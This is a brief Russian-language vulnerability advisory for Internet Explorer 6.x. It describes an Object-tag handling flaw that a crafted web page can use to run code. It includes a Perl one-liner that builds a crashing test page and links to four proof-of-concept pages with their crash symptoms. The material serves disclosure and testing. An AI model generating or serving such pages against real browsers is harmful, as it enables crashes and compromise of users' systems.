Программа: Microsoft Internet Explorer 6.x
Уязвимость позволяет скомпрометировать систему пользователя. Ошибка в
обработке тега Object позволяет выполнить произвольный код на уязвимой системе
при ее посещении специально сконструированной страницы.
Пример:
perl -e '{print "<STYLE></STYLE>\n<OBJECT>\nBork\n"x32}' >test.html
http://lcamtuf.coredump.cx/iedie2-1.html (eax=0x0, instant dereference)
http://lcamtuf.coredump.cx/iedie2-2.html (bogus esi on reload/leave)
http://lcamtuf.coredump.cx/iedie2-3.html (page fault on browser close)
http://lcamtuf.coredump.cx/iedie2-4.html (bogus esi on reload/leave)
